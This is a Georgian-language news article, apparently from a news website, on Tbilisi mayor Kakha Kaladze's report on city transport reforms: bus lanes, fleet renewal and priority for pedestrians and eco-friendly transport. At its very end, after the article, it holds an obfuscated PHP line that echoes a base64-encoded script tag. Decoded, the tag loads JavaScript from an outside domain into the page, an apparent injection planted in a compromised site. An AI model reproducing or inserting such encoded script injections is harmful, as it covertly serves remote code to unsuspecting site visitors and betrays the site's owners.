celsiusi
ავერსი საქკაბელი
პირადად მე, ასევე, ჩემს თანაგუნდელებს, იმ ადამიანებს, ვისაც უყვარს ჩვენი ქალაქი, ქვეყანა, ძალიან გვსიამოვნებს, როდესაც ვუყურებთ ქალაქს, სადაც საზოგადოებრივი ტრანსპორტი შეფერხების გარეშე გადაადგილდება, - ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ ტრანსპორტის პოლიტიკის მიმართულებით განხორციელებული პროექტების ანგარიშზე ისაუბრა.
 
მისი თქმით, მიუხედავად განხორციელებული რეფორმებისა, ამ მიმართულებით ჯერ კიდევ არსებობს გამოწვევები.
 
„დღეს, საზოგადოებას ვაბარებთ მორიგ ანგარიშს - სატრანსპორტო პოლიტიკის შესახებ. ეს არის ძალიან მნიშვნელოვანი მიმართულება, რომლის მიზანია, რომ მოქალაქეები სწრაფად და კომფორტულად, ყოველგვარი შეფერხების გარეშე გადაადგილდებოდნენ ქალაქის ერთი ადგილიდან მეორე მიმართულებით. როდესაც ჩვენმა გუნდმა თბილისის მუნიციპალიტეტი ჩაიბარა, სატრანსპორტო პოლიტიკის მიზნები თავიდანვე მკაფიოდ გვქონდა გაცხადებული. ჩვენ გვსურდა, რომ თბილისში ფუნდამენტურად შეგვეცვალა აქამდე არსებული მიდგომები, განგვეხორციელებინა შესაბამისი ტრანსპორტის მოდერნიზაცია, ინფრასტრუქტურის განახლება და ახალი რეფორმები წამოგვეწყო.
 
პირადად მე, ასევე, ჩემს თანაგუნდელებს, იმ ადამიანებს, ვისაც უყვარს ჩვენი ქალაქი, ქვეყანა, ძალიან გვსიამოვნებს, როდესაც ვუყურებთ ქალაქს, სადაც საზოგადოებრივი ტრანსპორტი შეფერხების გარეშე გადაადგილდება, თუმცა ამ მიმართულებით ჯერ კიდევ გვაქვს სერიოზული პრობლემები. პირველი ნაბიჯები გადაიდგა და ქალაქში ჩნდება შესაბამისი ავტობუსის ზოლები იმისთვის, რომ ავტობუსებმა, მიკროავტობუსებმა უპრობლემოდ შეძლონ გადაადგილება, რადგან მარტო ავტობუსების განახლება და ახალი პარკი ვერ მოგვცემს იმ შედეგს, რომ ჩვენმა მოსახლეობამ მოახერხოს კომფორტულად მგზავრობა, თუ ავტობუსებს შესაბამისი ინფრასტრუქტურა არ ექნება.
 
ასევე, ძალიან მნიშვნელოვანია ეკომეგობრული ტრანსპორტი, რომელსაც ყველა თაობის ადამიანი იყენებს, განსაკუთრებით კი ახალგაზრდები მოძრაობენ და როგორც ვიზუალური, ისე ფუნქციური თვალსაზრისით, ჩვენი დედაქალაქის სატრანსპორტო პოლიტიკა ევროპულ სტანდარტებს უახლოვდება“, - აღნიშნა კახა კალაძემ.
 
მისი თქმით, სატრანსპორტო პოლიტიკის მიმართულებით, დედაქალაქის მერიის პროგრამაში უპირატესობა პირველ რიგში, ენიჭებათ ქვეითებს, ფეხით მოსიარულეებს და ეკომეგობრულ ტრანსპორტს.
 
„ფაქტია, რომ გამართული სატრანსპორტო ქსელის გარეშე შეუძლებელია ქალაქი ურბანული თვალსაზრისით მოაწესრიგო, ხოლო მოძველებული ავტოპარკით გარემოსდაცვითი მიმართულებით ზრუნვა სასურველ შედეგებს ვერ გამოიღებს. სწორედ ამიტომ, ჩვენი მიდგომა იყო კომპლექსური, რათა ეკოლოგიურად სუფთა, თანამედროვე ინფრასტრუქტურა შეგვექმნა, დაგვემატებინა ახალი სერვისები და სატრანსპორტო პოლიტიკა არსებითად გაგვეუმჯობესებინა.
 
სატრანსპორტო პოლიტიკის მიმართულებით, ჩვენს პროგრამაში უპირატესობა პირველ რიგში, ენიჭებათ ქვეითებს, ფეხით მოსიარულეებს და ეკომეგობრულ ტრანსპორტს. შემდეგ საზოგადოებრივ ტრანსპორტს, რომლითაც ყოველდღიურად ასიათასობით ადამიანი გადაადგილდება, ხოლო ბოლოს კერძო ავტოსატრანსპორტო საშუალებებს.
 
ნამდვილად მეამაყება, რომ თბილისის მუნიციპალიტეტის მხრიდან ძალიან მნიშვნელოვანი და წარმატებული რეფორმები ხორციელდება. იცით, რატომ ვამაყობ ყველაზე მეტად ამ დაწყებული რეფორმით, რომელიც იმდენად მაშტაბურია რომ დასრულებას წლები დასჭირდება? წარმოიდგინეთ საბჭოთა კავშირის დროინდელი სისტემა, რომელსაც ხელს ვერავინ კიდებდა თანმდევი პოლიტიკური რისკების გამო, ყველა თავს არიდებდა მოსახლეობის ნაწილის მხრიდან ამის გამო უკმაყოფილებას, ოპონენტების მხრიდან კი პოლიტიკური დემაგოგიის ფრონტის გახსნას. მაგრამ ჩვენ გავრისკეთ და გადავდგით ეს ნაბიჯი, რომელიც სასიცოცხლოდ მნიშვნელოვანი იყო ჩვენი ქალაქისთვის.
 
მიმაჩნია, რომ სატრანსპორტო მიმართულებით, ათწლეულების განმავლობაში დაგროვილი პრობლემების გამოსწორების დაწყება უდრიდა ერთგვარ შოკურ თერაპიას, მაგრამ რეფორმა საჭირო იყო თბილისისთვის და ჩვენ გავრისკეთ ამ გამოწვევასთან შეჭიდება. მინდა ვისარგებლო შემთხვევით და თითოეულ თბილისელს ძალიან დიდი მადლობა გადავუხადო თანადგომისა და მხარდაჭერისთვის. ჩვენ ვარჩიეთ ქალაქის, მოქალაქეების ინტერესები და არა პოლიტიკურად მომგებიანი პოზა, ჩვენ პოპულიზმს საქმის კეთება ვარჩიეთ და ეს სითამამე, გნებავთ პატრიოტიზმი ნამდვილად მეამაყება“, - განაცხადა თბილისის მერმა.
 
ამასთან, კახა კალაძემ მადლობა გადაუხადა ყველა იმ კომპანიას და ადგილობრივ და უცხოელ ექსპერტებს, რომლებიც სატრანსპორტო პოლიტიკის მიმართულებით განხორციელებულ პროექტებში მუნიციპალიტეტს თანადგომასა და მხარდაჭერას უცხადებენ.
 
„მიხარია და მჯერა, რომ როცა სატრანსპორტო რეფორმა დასრულდება არამარტო თბილისელები, არამარტო ჩემი გუნდი, არამედ ყველა მართლა ქვეყანაზე მზრუნველი ადამიანი, პოლიტიკოსებიც დააფასებენ გაწეულ სამუშაოს. მჯერა, რომ უახლოეს მომავალში თბილისი დადგება სხვა ევროპული დედაქალაქების გვერდით გამართული სატრანსპორტო პოლიტიკით.
 
ამ მიმართულებით ჯერ კიდევ ბევრია გასაკეთებელი, ბევრი გადაწყვეტილება გვაქვს მისაღები იმისთვის, რომ ეს მიმართულება მთლიანად იყოს მოწესრიგებული და გამართული. ყველა იმ კომპანიას მინდა მადლობა გადავუხადო, ვინც ამ რეფორმების განხორციელებაში გვეხმარება. ასევე, ადგილობრივ ქართველ ექსპერტებს“, - განაცხადა კახა კალაძემ.
 
ტრანსპორტის პოლიტიკის მიმართულებით განხორციელებული პროექტების ანგარიშს ესწრებოდნენ პარტია „ქართული ოცნება - დემოკრატიული საქართველოს“ თავმჯდომარე ირაკლი კობახიძე, თბილისის საკრებულოს თავმჯდომარე გიორგი ტყემალაძე, საქართველოს პარლამენტის, დედაქალაქის მერიისა და საკრებულოს წევრები, საერთაშორისო საფინანსო ორგანიზაციების წარმომადგენლები, ასევე, როგორც უცხოელი, ასევე ქართველი დარგის სპეციალისტები.
1366
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");